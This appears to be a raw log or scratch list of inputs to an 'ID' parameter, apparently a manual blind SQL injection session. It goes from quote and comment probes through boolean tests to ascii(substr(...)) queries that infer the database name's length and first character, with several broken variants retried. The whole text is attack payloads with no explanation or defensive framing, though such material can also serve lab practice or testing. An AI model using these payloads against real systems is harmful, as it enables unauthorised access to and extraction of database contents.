ID:1
ID:1'
ID:1"
ID:1"-- 
ID:1" and 1=1;-- 
ID:1" and 1=2;-- 
ID:-1" or ascii(substr((length database()),1,1)>8;-- 
ID:-1" or ascii(substr((length database()),1,1)>8;-- 
ID:-1" or ascii(substr((length (database())),1,1)>8;-- 
ID:-1" or ascii(substr((length (database())),1,1)>56 ;-- 
ID:-1" or ascii(substr((length (database())),1,1)>56 ;-- 
ID:-1" or ascii(substr((length (database())),1,1)>56 -- 
ID:-1 or ascii(substr((length (database())),1,1)>56 -- 
ID:-1 or ascii(substr((length (database())),1,1)>56 -- 
ID:-1" or ascii(substr(length (database()),1,1)>56 -- 
ID:-1" or ascii(substr(length (database()),1,1)>56 ;-- 
ID:-1" or ascii(substr(length (database()),1,1)>56 ;
ID:-1" or ascii(substr(length (database()),1,1)>56 ;
ID:-1" or (ascii(substr(length (database()),1,1))>56 ;
ID:1" and 1=2;-- 
ID:-1" or 1=1;-- 
ID:-1" or ascii(substr((length (database())),1,1))>1;-- 
ID:-1" or ascii(substr((length (database())),1,1))>50;-- 
ID:-1" or ascii(substr((length (database())),1,1))>55;-- 
ID:-1" or ascii(substr((length (database())),1,1))>58;-- 
ID:-1" or ascii(substr((length (database())),1,1))>57;-- 
ID:-1" or ascii(substr((length (database())),1,1))>56;-- 
ID:-1" or ascii(substr((length (database())),1,1))>55;-- 
ID:-1"
ID:-1" or ascii(substr((select database()),1,1))>100;-- 
ID:-1" or ascii(substr((select database()),1,1))>100;-- 
ID:-1" or ascii(substr((select database()),1,1))>100;-- 
ID:-1" or ascii(substr((select database()),1,1))>100;-- 
